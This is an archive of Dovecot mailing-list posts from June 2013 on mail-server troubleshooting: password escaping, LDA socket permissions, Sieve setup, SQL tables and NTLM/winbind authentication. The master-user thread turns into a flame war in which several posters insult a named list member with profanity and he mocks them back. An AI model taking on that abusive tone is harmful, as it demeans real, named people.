user+dovecot at localhost.localdomain.org Fri Jun 21 23:39:02 2013 From: user+dovecot at localhost.localdomain.org (Pascal Volk) Date: Fri, 21 Jun 2013 22:39:02 +0200 Subject: [Dovecot] Pound Sign # in password In-Reply-To: References: Message-ID: <51C4B9E6.6070102@localhost.localdomain.org> On 06/19/2013 04:11 AM Jackie Lowery wrote: > Is there any way to use a pound sign # in my postfix user password in the > dovecot sql configuration file. ,--[ http://wiki2.dovecot.org/AuthDatabase/SQL#MySQL ]-- | Use "host= ... pass=foo#bar" if your password has '#' character `-- Regards, Pascal -- The trapper recommends today: deadbeef.1317222 at localdomain.org From jackiellowery at gmail.com Fri Jun 21 23:52:51 2013 From: jackiellowery at gmail.com (Jackie Lowery) Date: Fri, 21 Jun 2013 15:52:51 -0500 Subject: [Dovecot] Pound Sign # in password In-Reply-To: <51C4B9E6.6070102@localhost.localdomain.org> References: <51C4B9E6.6070102@localhost.localdomain.org> Message-ID: I figured it out a few days ago. I didn't see that wiki. Thanks for the help though. On Fri, Jun 21, 2013 at 3:39 PM, Pascal Volk < user+dovecot at localhost.localdomain.org> wrote: > On 06/19/2013 04:11 AM Jackie Lowery wrote: > > Is there any way to use a pound sign # in my postfix user password in the > > dovecot sql configuration file. > > ,--[ http://wiki2.dovecot.org/AuthDatabase/SQL#MySQL ]-- > | Use "host= ... pass=foo#bar" if your password has '#' character > `-- > > > Regards, > Pascal > -- > The trapper recommends today: deadbeef.1317222 at localdomain.org > From ben at indietorrent.org Sat Jun 22 01:07:22 2013 From: ben at indietorrent.org (Ben Johnson) Date: Fri, 21 Jun 2013 18:07:22 -0400 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <20130621200109.GA3365@anubis.morrow.me.uk> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> <51C48EAE.5020308@indietorrent.org> <20130621200109.GA3365@anubis.morrow.me.uk> Message-ID: <51C4CE9A.3070300@indietorrent.org> Ben Morrow, thanks for your reply. I sent an update on the issue shortly before you sent this reply. The issue is that the "vmail" user lacks the rights required to read Dovecot's configuration file (at least that's what I gather from the message obtained with strace). But for the sake of thoroughness, I'll address each of your questions. On 6/21/2013 4:01 PM, Ben Morrow wrote: > At 1PM -0400 on 21/06/13 you (Ben Johnson) wrote: >> On 6/20/2013 10:00 PM, Bob Miller wrote: >>> >>>> It really boils-down to the fact that I can call the following on the >>>> command-line and it functions as expected: >>>> >>>> su vmail -c '/usr/lib/dovecot/deliver -a "sa-training at example.com" -d >>>> "sa-training at example.com" -m "Training.SPAM" -p >>>> "/tmp/sendmail-msg-25794.txt"' >>>> >>>> Yet, when I attempt to do the exact same thing from within the pipe >>>> script that Dovecot Antispam calls, I receive exit code 75 from >>>> deliver/dovecot-lda and absolutely nothing is logged, with exception of >>>> the information of which I'm already aware (logged to syslog). > > Can you change lda to always log to syslog? It's possible you're not > seeing any logs because lda doesn't have permission to write to the log > files. I tried both options: setting LDA to log to syslog (and it logged plenty of items, just nothing related to the pipe script's call to "deliver"), and I tried specifying the log file locations, explicitly, with the "log_path" and "info_log_path" directives within my "protocol lda {}" stanza. Again, LDA wrote to the log files for other reasons, but nothing relevant to the specific problem with "deliver" failing to deliver. >>>> I am echo-ing $(whoami) just before calling "deliver" within the pipe >>>> script and the output is "vmail". So, it's not as though the vmail user >>>> somehow lacks the permissions required to send via dovecot-lda. >>> >>> There are two things that came to mind when I read your mail yesterday. >>> They are the first things I check for when my commands work and my >>> scripts don't. >>> >>> The first is $PATH, I have found innumerable times when a script >>> wouldn't run it was because it wasn't running with a fully loaded $PATH >>> variable, and this is especially true if you are launching your script >>> from cron. To work around this I either put a PATH= at the top of the >>> script, or I run the script as an argument to bash instead of using the >>> executable bit (ie `bash /path/to/script.sh` instead of `./script.sh`) >>> so the path is retained from the shell. I decided against mentioning >>> this yesterday because I noted you only used full paths in your script, >>> which should also work to avoid this problem. >> >> All excellent insights. >> >> You can see the PATH value in my previous message on this subject (from >> a few minutes ago); it matches the value that I see as "root" when I >> print the PATH within the shell. So, that seems okay. >> >> Also, I took your good advice and eliminated the potential for the vmail >> user's shell choice (which happens to be /bin/sh, *not* /bin/bash) > > Are you on a system where they are different? I believe that they are different in Debian. "ls" for these files produces the following: /bin/sh -> dash /bin/bash Even so, the script seems to function the same way with either interpreter, so, this doesn't seem to be a factor. >> to >> affect the script's behavior. To do this I modified my antispam >> configuration directives as such: >> >> antispam_pipe_program = /bin/bash > > It's generally better to write scripts in portable (or POSIX, at least) > Bourne shell, rather than relying on features of particular shells. That makes fine sense, and I'll take it under advisement and see if I can modify the script to be as universal as possible. > >> antispam_pipe_program_args = /usr/bin/sa-learn-pipe.sh >> antispam_pipe_program_spam_arg = --spam >> antispam_pipe_program_notspam_arg = --ham >> >> Unfortunately, this change doesn't change the result at all; the call to >> "deliver" still exits with status code 75. >> >>> The other thing I didn't mention was the permissions on the path >>> to /usr/lib/dovecot/deliver (or any other path, really). Directories >>> with no world read/execute can prevent scripts from using files beneath >>> them if they don't have permissions on each directory level in the path. >>> I didn't mention this yesterday because you said you ran the script as >>> vmail. However, looking at your "su vmail -c" command, I remember some >>> times when "su postrgres -c" didn't work when "su - postrgres" then >>> running the command did. >> >> I have tried using "su vmail -c [...]", as well as "su vmail" and then >> pasting the command into the shell. Both yield the same result. > > Have you checked the group rights are the same in both cases? Is there > any sort of MAC framework (SELinux or something similar) involved here? Yes, the group rights should be the same, and no MAC framework is at play. >> Also, there's no question that the vmail user is able to execute >> dovecot-adm; if he weren't, then a) pasting the command into the shell >> wouldn't work (and this does work), and b) I wouldn't be receiving exit >> status code 75, which is unique to dovecot-adm (I assume that I'd >> receive a more generic code, like 1, if it was a permissions problem). > > 75 is a standard exit code from indicating temporary > failure. Mail delivery programs need to be careful to distinguish > between temporary and permanent failure, so they nearly always use the > appropriate exit code. Thank you for this informative tidbit! >> >>> Probably neither of these will be useful to you, but I mention them in >>> hope that they trigger and idea or set you on an investigative path that >>> proves helpful... >> >> Any help at all is useful! I really appreciate the time and thought you >> put into your posts. I wish I felt closer to a solution... :( >> >> Please do reply if you have any additional thoughts. I'm at my wit's end >> here! > > As I believe someone else has already mentioned, the big hammer of > strace is probably the most straightforward next step. And it was what lead me to the root-cause (still looking for the solution, however); right you gents were! THANK YOU! > Ben > From d.parthey at metaways.de Sat Jun 22 01:52:31 2013 From: d.parthey at metaways.de (Daniel Parthey) Date: Sat, 22 Jun 2013 00:52:31 +0200 Subject: [Dovecot] Sieve Plugin Setup In-Reply-To: <8D03B7C70B1E5CB-1378-2D92D@webmail-m274.sysops.aol.com> References: <8D03B7C70B1E5CB-1378-2D92D@webmail-m274.sysops.aol.com> Message-ID: <51C4D92F.2020106@metaways.de> Hi Denny, Am 20.06.2013 05:21, schrieb Denny Jones: > I've got an existing setup that I want to add Sieve filtering to. I'm on QmailToaster: > > qmailadmin-toaster-1.2.16-1.4.0 > > I using Dovecot version 2.0.11 > > I'm looking for a good tutorial for installing Sieve Rules functionality on an existing system. Anybody know of one? > Anybody else done this? Do I just install the latest Dovecot-sieve plugin release with wget, etc? You will need to use prebuilt-packages of Dovecot and Pigeonhole or recompile Pigeonhole against your current Dovecot version so that there is no version mismatch between them. > What kind of configuration can I expect to have to go through. > Do I have to reconfigure Dovecot to work in conjunction with the Sieve plugin? The pigeonhole module adds SIEVE functionality to Dovecot, the Dovecot wiki describes how to download and install it: http://wiki2.dovecot.org/Pigeonhole/Installation Dovecot configuration for SIEVE plugin is documented at: http://wiki2.dovecot.org/Pigeonhole/Sieve http://wiki2.dovecot.org/Pigeonhole/Sieve/Configuration Regards Daniel -- Dipl.-Inf. Daniel Parthey System Engineer Metaways Infosystems GmbH Pickhuben 2, D-20457 Hamburg E-Mail: d.parthey at metaways.de Web: http://www.metaways.de Tel: +49 (0)40 317031-537 Fax: +49 (0)40 317031-937 Metaways Infosystems GmbH - Sitz: D-22967 Tremsb?ttel Handelsregister: Amtsgericht L?beck HRB 4508 AH Gesch?ftsf?hrung: Hermann Thaele, L?der-H.Thaele From thomas-lists at nybeta.com Sat Jun 22 01:58:04 2013 From: thomas-lists at nybeta.com (Thomas Harold) Date: Fri, 21 Jun 2013 18:58:04 -0400 Subject: [Dovecot] Sieve file permission problem In-Reply-To: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> References: <25E4BE7C7FD74CAF870820FCE3956BBB@lippai.net> Message-ID: <51C4DA7C.1070305@nybeta.com> On 6/20/2013 4:16 AM, Zoltan Lippai wrote: > Thanks for the answer, I'm not sure what you mean by the additional permission details. If you have SELinux in Enforcing mode, you should also look at using "ls -lZ" to get the file context. You can also use "selart -a /var/log/audit/audit.log" to see whether dovecot or anything else is throwing AVC exceptions that need to be addressed. From mohsen at pahlevanzadeh.org Sat Jun 22 02:25:37 2013 From: mohsen at pahlevanzadeh.org (Mohsen Pahlevanzadeh) Date: Sat, 22 Jun 2013 03:55:37 +0430 Subject: [Dovecot] tables between dovecot and postfix and a paradoxical question Message-ID: <1371857137.24914.18.camel@debian> Dear all, I read we create the following table in wiki2 : CREATE TABLE users ( userid VARCHAR(128) NOT NULL, domain VARCHAR(128) NOT NULL, password VARCHAR(64) NOT NULL, home VARCHAR(255) NOT NULL, uid INTEGER NOT NULL, gid INTEGER NOT NULL ); But i read the following text in the official postfix documentation : "DO create tables with each matching item as a key and with an arbitrary value. With SQL databases it is not uncommon to return the key itself or a constant value." ref: http://www.postfix.org/mysql_table.5.html How can i combine together? --mohsen From pixilla at macports.org Sat Jun 22 02:54:46 2013 From: pixilla at macports.org (Bradley Giesbrecht) Date: Fri, 21 Jun 2013 16:54:46 -0700 Subject: [Dovecot] tables between dovecot and postfix and a paradoxical question In-Reply-To: <1371857137.24914.18.camel@debian> References: <1371857137.24914.18.camel@debian> Message-ID: <9A296238-A0B4-46B0-BFA6-DCC92E53434F@macports.org> On Jun 21, 2013, at 4:25 PM, Mohsen Pahlevanzadeh wrote: > Dear all, > > I read we create the following table in wiki2 : > CREATE TABLE users ( > userid VARCHAR(128) NOT NULL, > domain VARCHAR(128) NOT NULL, > password VARCHAR(64) NOT NULL, > home VARCHAR(255) NOT NULL, > uid INTEGER NOT NULL, > gid INTEGER NOT NULL > ); > > But i read the following text in the official postfix documentation : > "DO create tables with each matching item as a key and with > an arbitrary value. With SQL databases it is not uncommon > to return the key itself or a constant value." > ref: http://www.postfix.org/mysql_table.5.html > > How can i combine together? I'm not sure I understand you problem but for dovecot and postfix the important thing is to return the query result that meets your needs. How the tables are create and related does not really matter. If you are having problems it is most likely your select query. Regards, Bradley Giesbrecht (pixilla) From jtam.home at gmail.com Sat Jun 22 03:56:37 2013 From: jtam.home at gmail.com (Joseph Tam) Date: Fri, 21 Jun 2013 17:56:37 -0700 (PDT) Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: References: Message-ID: Ben Johnson writes: > I added debugging output to the script, which now prints the environment > variables. My script now outputs the following: > ... > CONFIG_FILE=/var/run/dovecot/config > ... > Does anything jump-out at you? You didn't provide the analogous output from the interactive shell to see the differences (for example, USER might be being used), but from your later strace, I guess CONFIG_FILE has something to do with it. These threads seems relevant http://www.dovecot.org/list/dovecot/2011-May/059127.html http://www.mail-archive.com/dovecot at dovecot.org/msg38349.html That thread poster solved his problem by commenting out service imap-postlogin { # user = $default_internal_user ... } but I have no idea if it works, or whether it's a good idea, for your case. More docs http://wiki2.dovecot.org/PostLoginScripting Joseph Tam From nick.z.edwards at gmail.com Sat Jun 22 04:02:59 2013 From: nick.z.edwards at gmail.com (Nick Edwards) Date: Sat, 22 Jun 2013 11:02:59 +1000 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <51C4558C.3050608@alec.pl> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <51C4558C.3050608@alec.pl> Message-ID: On 6/21/13, A.L.E.C wrote: > On 06/21/2013 03:21 PM, Reindl Harald wrote: >> >> >> Am 21.06.2013 06:30, schrieb izul: >>> Im planning to migrate my mail server using imapsync.I need master user >>> in >>> my dovecot 1.1.20.Im so blind about this.Anybody can help me? >> >> why in the world is someone installing 1.1 in 2013 on a new server >> while current version is 2.2.3 and virtually nobody knows about >> 1.1 years after support was dropped? > > Do you really have to respond to every email on this list? Even if you > have nothing productive to say? Please. > > As I understand the OP, he uses 1.1.20 now and this is the version to > migrate from. > Save your breath, Harald is just a complete abrasive jagoff, on this and every other list, I know for a fact that he is one step from being banned off the apache lists, his arsehole attitude to the world has been pointed out to him many time before, by many people, he just does not get it From h.reindl at thelounge.net Sat Jun 22 05:12:10 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sat, 22 Jun 2013 04:12:10 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <51C4558C.3050608@alec.pl> Message-ID: <51C507FA.2080406@thelounge.net> Am 22.06.2013 03:02, schrieb Nick Edwards: > Save your breath, Harald is just a complete abrasive jagoff, on this > and every other list, I know for a fact that he is one step from being > banned off the apache lists you know for a fact *what*? there are very very few posts from me on the apache lists and now come one and show me a abusive one or do yourself a favour and be quiet well, i have *zero* understanding for people using for years not supported software on public machines, well if this makes me to an asshole so it be - period -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From noel.butler at ausics.net Sat Jun 22 10:32:18 2013 From: noel.butler at ausics.net (Noel Butler) Date: Sat, 22 Jun 2013 17:32:18 +1000 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <51C507FA.2080406@thelounge.net> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <51C4558C.3050608@alec.pl> <51C507FA.2080406@thelounge.net> Message-ID: <1371886338.11506.13.camel@tardis> /me lowers myself to harrys level coz he might understand it only harry needs to read my reply, no one else should as your ears may burn :) On Sat, 2013-06-22 at 04:12 +0200, Reindl Harald wrote: > > Am 22.06.2013 03:02, schrieb Nick Edwards: > > Save your breath, Harald is just a complete abrasive jagoff, on this > > and every other list, I know for a fact that he is one step from being > > banned off the apache lists > > you know for a fact *what*? > > there are very very few posts from me on the apache lists and > now come one and show me a abusive one or do yourself a favour > and be quiet > > well, i have *zero* understanding for people using for years > not supported software on public machines, well if this > makes me to an asshole so it be - period > > be an asshole to yourself then idiot and keep your fucking mouth SHUT if you have nothing helpful to say, especially to those who are new or stuck on certain versions due to policies which you do not write or have any input on (thank christ), some may not know better and do NOT deserve to be spoken down at by some caustic fuckwit like you you of course are always welcome to have a say in a polite term to newbies etc assisting them by politely explaining why its best to not use such version or whatever - otherwise, fuck off and dont say a word to them, assholes like you give lists a bad name, sure I am NOT innocent in some respects to this, but at least I only attack the trolls and ranting idiots (like you, now), but you however, attack anyone, and theres no excuse for THAT. -------------- next part -------------- A non-text attachment was scrubbed... Name: face-smile.png Type: image/png Size: 873 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 490 bytes Desc: This is a digitally signed message part URL: From e-frog at gmx.de Sat Jun 22 10:57:12 2013 From: e-frog at gmx.de (e-frog) Date: Sat, 22 Jun 2013 09:57:12 +0200 Subject: [Dovecot] Calling dovecot-lda from within Antispam pipe script (bash) seems to have no effect In-Reply-To: <51C4AF88.3040205@indietorrent.org> References: <51C1FDFE.8010506@indietorrent.org> <1371701672.2588.50.camel@worklian> <51C30B3D.3070109@indietorrent.org> <51C32ED5.2090709@indietorrent.org> <1371780023.2588.175.camel@worklian> <51C48EAE.5020308@indietorrent.org> <51C4A323.6030905@ii.nl> <51C4AF88.3040205@indietorrent.org> Message-ID: <51C558D8.1070207@gmx.de> On 21.06.2013 21:54, wrote Ben Johnson: > > write(2, "\1\00429770 user sa-training at exampl"..., 139^A^D29770 user > sa-training at example.com: Error reading configuration: > net_connect_unix(/var/run/dovecot/config) failed: Permission denied > > It seems the issue here is that "root" is the only user who is allowed > to read Dovecot's configuration file. Presumably, Dovecot, like most > services, is started as "root" and then drops its permissions to > least-required once started. > You can change owner and mode for /var/run/dovecot/config with the following entry in 10-master.conf: service config { unix_listener config { mode = 0600 user = vmail } } More details can be found here: http://wiki2.dovecot.org/Services /e-frog From ninja.ak at gmail.com Sat Jun 22 12:35:35 2013 From: ninja.ak at gmail.com (=?UTF-8?B?4pmlIE5pTkpBIOKZgg==?=) Date: Sat, 22 Jun 2013 14:05:35 +0430 Subject: [Dovecot] use Alternative Storage as a cloud mail service Message-ID: Hi all I'm trying to create a mail service provider I like to know is it possible to have some servers as storage servers And automatically put email datas on the servers Something like having 3 servers , If server two get full , Automatically use server three If it's possible give me some solutions to use I like to use CentOS OS on my servers Thanks in advance From wdgarc88 at gmail.com Sat Jun 22 13:08:59 2013 From: wdgarc88 at gmail.com (Edwardo Garcia) Date: Sat, 22 Jun 2013 20:08:59 +1000 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1371886338.11506.13.camel@tardis> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <51C4558C.3050608@alec.pl> <51C507FA.2080406@thelounge.net> <1371886338.11506.13.camel@tardis> Message-ID: I agree completely, I for one am also very sick of Harald's venomous rhetoric on this list. I am surprised that a moderator has not banned Harald or officially warned him. I am not one for such language, but I spent only five minutes googling Harald, and I see what you have meant, perhaps as you alluded to, sometimes you need to speak baby talk, to talk to baby. On Sat, Jun 22, 2013 at 5:32 PM, Noel Butler wrote: > /me lowers myself to harrys level coz he might understand it > > only harry needs to read my reply, no one else should as your ears may > burn :) > > On Sat, 2013-06-22 at 04:12 +0200, Reindl Harald wrote: > > > > > Am 22.06.2013 03:02, schrieb Nick Edwards: > > > Save your breath, Harald is just a complete abrasive jagoff, on this > > > and every other list, I know for a fact that he is one step from being > > > banned off the apache lists > > > > you know for a fact *what*? > > > > there are very very few posts from me on the apache lists and > > now come one and show me a abusive one or do yourself a favour > > and be quiet > > > > well, i have *zero* understanding for people using for years > > not supported software on public machines, well if this > > makes me to an asshole so it be - period > > > > > > > > > be an asshole to yourself then idiot and keep your fucking mouth SHUT if > you have nothing helpful to say, especially to those who are new or > stuck on certain versions due to policies which you do not write or have > any input on (thank christ), some may not know better and do NOT deserve > to be spoken down at by some caustic fuckwit like you > > you of course are always welcome to have a say in a polite term to > newbies etc assisting them by politely explaining why its best to not > use such version or whatever - otherwise, fuck off and dont say a word > to them, assholes like you give lists a bad name, sure I am NOT innocent > in some respects to this, but at least I only attack the trolls and > ranting idiots (like you, now), but you however, attack anyone, and > theres no excuse for THAT. > > From h.reindl at thelounge.net Sat Jun 22 13:24:43 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sat, 22 Jun 2013 12:24:43 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1371886338.11506.13.camel@tardis> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <51C4558C.3050608@alec.pl> <51C507FA.2080406@thelounge.net> <1371886338.11506.13.camel@tardis> Message-ID: <51C57B6B.7080406@thelounge.net> Am 22.06.2013 09:32, schrieb Noel Butler: >> well, i have *zero* understanding for people using for years >> not supported software on public machines, well if this >> makes me to an asshole so it be - period >> > some may not know better how comes? http://www.dovecot.org/ starts at the top with Mon Jun 17 00:42:32 EEST 2013 Released v2.2.3. > and do NOT deserve to be spoken down at > by some caustic fuckwit like you "why in the world is someone installing 1.1 in 2013 on a new server while current version is 2.2.3" is spoken down? laughable! > you of course are always welcome to have a say in a polite term to > newbies etc assisting them by politely explaining why its best to not > use such version or whatever how comes that most mailing-lists are full of gorgeous girls starting to cry after ervy not beloved word? -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From h.reindl at thelounge.net Sat Jun 22 14:04:47 2013 From: h.reindl at thelounge.net (Reindl Harald) Date: Sat, 22 Jun 2013 13:04:47 +0200 Subject: [Dovecot] Config for master user in dovecot 1.1.20 In-Reply-To: <1371886338.11506.13.camel@tardis> References: <1371789010512-42906.post@n4.nabble.com> <51C45352.3030704@thelounge.net> <51C4558C.3050608@alec.pl> <51C507FA.2080406@thelounge.net> <1371886338.11506.13.camel@tardis> Message-ID: <51C584CF.4090007@thelounge.net> Am 22.06.2013 09:32, schrieb Noel Butler: > especially to those who are new or stuck on certain versions > due to policies which you do not write or have any input on well and in this case you refer to LTS distributions and the one who is responsible and the commercial support which is the reason to stick on a outdated version are the ones to ask, they get paid for.......... -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 263 bytes Desc: OpenPGP digital signature URL: From utegrad at gmail.com Sat Jun 22 02:11:11 2013 From: utegrad at gmail.com (Matthew Larsen) Date: Fri, 21 Jun 2013 16:11:11 -0700 Subject: [Dovecot] Getting NTLM authentication for Postfix SMTP clients to work Message-ID: I'm trying to get NTLM authentication working with Dovecot to authenticate Postfix SMTP clients. I can authenticate postfix smtp clients using the plain text login mechanism through winbind. However, using the NTLM mechanism gives me an error in my maillog that says: "dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL". At this point, I'm rather stuck. It appears PAM and winbind work for authenticating with AD because it works with the plain text mechanism, but I'm missing something with the NTLM authentication method. Any suggestions as to what I've got wrong, or other logging I can turn up / examine that might shed some light on this? When I use the LOGIN mechanism I see this in the mail logging and the message is relayed: Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: connect from nvit01b.mydomain.com[10.20.2.**0] Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=1501) Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011PLAIN#011service=**smtp#011nologin#011lip=10.20.**4 .12#011rip=10.20.2.0#011resp=**AG[...snip...]g== Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): lookup service=dovecot Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: pam(myusername,10.20.2.0): #1/1 style=1 msg=Password: Jun 21 13:12:58 SBSMTPNV05 dovecot: auth: Debug: client out: OK#0111#011user=myusername Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: 54EAF8059B: client= nvit01b.mydomain.com[**10.20.2.0], sasl_method=PLAIN, sasl_username=myusername Jun 21 13:12:58 SBSMTPNV05 postfix/cleanup[1504]: 54EAF8059B: message-id=< 51C4B3C8.30008@**domain1.com <51C4B3C8.30008 at domain1.com>> Jun 21 13:12:58 SBSMTPNV05 postfix/qmgr[1499]: 54EAF8059B: from=< someone at domain1.com>, size=2700, nrcpt=1 (queue active) Jun 21 13:12:58 SBSMTPNV05 postfix/smtpd[1501]: disconnect from nvit01b.mydomain.com[10.20.2.**0] Jun 21 13:12:59 SBSMTPNV05 postfix/smtp[1505]: 54EAF8059B: to=< someone at gmail.com>, relay=gmail-smtp-in.l.google.**com[74.125.25.27]:25, delay=1.2, delays=0.23/0.04/0.16/0.72, dsn=2.0.0, status=sent (250 2.0.0 OK 1371845579 wf5si3786287pab.138 - gsmtp) Jun 21 13:12:59 SBSMTPNV05 postfix/qmgr[1499]: 54EAF8059B: removed I also see this in the secure log: Jun 21 13:12:58 SBSMTPNV05 auth: pam_unix(dovecot:auth): authentication failure; logname= uid=0 euid=0 tty=dovecot ruser=myusername rhost=10.20.2.0 user=myusername Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): getting password (0x00000010) Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): pam_get_item returned a password Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:auth): user 'myusername' granted access Jun 21 13:12:58 SBSMTPNV05 auth: pam_winbind(dovecot:account): user 'myusername' granted access However, when I switch the mechanism to NTLM in the Thurnderbird MUA I see this: Jun 21 13:15:46 SBSMTPNV05 postfix/smtpd[1506]: connect from nvit01b.mydomain.com[10.20.2.**0] Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Loading modules from directory: /usr/lib64/dovecot/auth Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/**libauthdb_ldap.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/**libdriver_sqlite.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: Module loaded: /usr/lib64/dovecot/auth/**libmech_gssapi.so Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: auth client connected (pid=1506) Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client in: AUTH#0111#011NTLM#011service=**smtp#011nologin#011lip=10.20.**4. 12#011rip=10.20.2.0#011resp=**TlRMT[...snip...]A= Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client out: CONT#0111#011TlRMT[[...snip...**]A Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: Debug: client in: CONT#0111#011TlRMT[...snip...]**A= Jun 21 13:15:46 SBSMTPNV05 dovecot: auth: winbind(?,10.20.2.0): user not authenticated: NT_STATUS_UNSUCCESSFUL Jun 21 13:15:48 SBSMTPNV05 postfix/smtpd[1506]: warning: nvit01b.mydomain.com[10.20.2.**0]: SASL NTLM authentication failed: TlRMT[...snip...]A Jun 21 13:15:48 SBSMTPNV05 dovecot: auth: Debug: client out: FAIL#0111 Jun 21 13:15:49 SBSMTPNV05 postfix/smtpd[1506]: disconnect from nvit01b.mydomain.com[10.20.2.**0] with nothing in the secure log and I don't see anything show up in the winbind logs either. I've reviewed these pages as reference, and I'm not sure what I'm missing: http://wiki2.dovecot.org/**HowTo/ActiveDirectoryNtlm http://wiki2.dovecot.org/**Authentication/Mechanisms/NTLM http://www.dovecot.org/list/**dovecot/2008-December/035630.**html http://www.dovecot.org/list/**dovecot/2010-February/046763.**html http://blog.al-shami.net/2008/**05/freebsd-postfix-dovecot-** and-active-directory/ http://wiki2.dovecot.org/**HowTo/PostfixAndDovecotSASL Here's some of my relevant configuration as I understand it: I've joined the computer to the AD domain. The wbinfo tests work fine: # wbinfo -t checking the trust secret for domain MYDOMAIN via RPC calls succeeded # doveconf -n # 2.0.9: /etc/dovecot/dovecot.conf # OS: Linux 2.6.32-358.11.1.el6.x86_64 x86_64 CentOS release 6.4 (Final) auth_debug_passwords = yes auth_mechanisms = plain ntlm login auth_use_winbind = yes auth_username_format = %Lu listen = * mbox_write_locks = fcntl passdb { driver = pam } service auth { unix_listener /var/spool/postfix/private/**auth { group = postfix mode = 0666 user = postfix } } ssl_cert = dns_lookup_realm = true dns_lookup_kdc = true ticket_lifetime = 24h renew_lifetime = 7d forwardable = true [domain_realm] .mydomain.com = MYDOMAIN.COM mydomain.com = MYDOMAIN.COM //////////////////// system keytab: # klist -ke Keytab name: FILE:/etc/krb5.keytab KVNO Principal ---- ------------------------------**------------------------------** -------------- 3 host/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (des-cbc-crc) 3 host/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (des-cbc-md5) 3 host/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (arcfour-hmac) 3 host/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (aes128-cts-hmac-sha1-96) 3 host/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (aes256-cts-hmac-sha1-96) 3 host/sbsmtpnv05 at MYDOMAIN.COM (des-cbc-crc) 3 host/sbsmtpnv05 at MYDOMAIN.COM (des-cbc-md5) 3 host/sbsmtpnv05 at MYDOMAIN.COM (arcfour-hmac) 3 host/sbsmtpnv05 at MYDOMAIN.COM (aes128-cts-hmac-sha1-96) 3 host/sbsmtpnv05 at MYDOMAIN.COM (aes256-cts-hmac-sha1-96) 3 SBSMTPNV05$@MYDOMAIN.COM (des-cbc-crc) 3 SBSMTPNV05$@MYDOMAIN.COM (des-cbc-md5) 3 SBSMTPNV05$@MYDOMAIN.COM (arcfour-hmac) 3 SBSMTPNV05$@MYDOMAIN.COM (aes128-cts-hmac-sha1-96) 3 SBSMTPNV05$@MYDOMAIN.COM (aes256-cts-hmac-sha1-96) 5 smtp/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (des-cbc-crc) 5 smtp/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (des-cbc-md5) 5 smtp/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (arcfour-hmac) 5 smtp/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (aes128-cts-hmac-sha1-96) 5 smtp/sbsmtpnv05.mydomain.com@**MYDOMAIN.COM (aes256-cts-hmac-sha1-96) //////////////////// Samba config: [global] workgroup = MYDOMAIN realm = MYDOMAIN.COM server string = Samba Server Version %v security = ADS kerberos method = system keytab log file = /var/log/samba/log.%m max log size = 50 printcap name = /dev/null domain master = No template shell = /bin/bash winbind separator = + winbind use default domain = Yes idmap config * : range = 10000-50000 idmap config * : backend = tdb printing = bsd cups options = raw print command = lpr -r -P'%p' %s lpq command = lpq -P'%p' lprm command = lprm -P'%p' %j From denis.kasak at gmail.com Sat Jun 22 04:34:54 2013 From: denis.kasak at gmail.com (Denis Kasak) Date: Sat, 22 Jun 2013 03:34:54 +0200 Subject: [Dovecot] Problem with virtual user mailbox initialization Message-ID: Hello, I'm trying to set up a postfix/dovecot server where postfix hands over incoming mail to dovecot using lmtp virtual transport via a Unix socket. 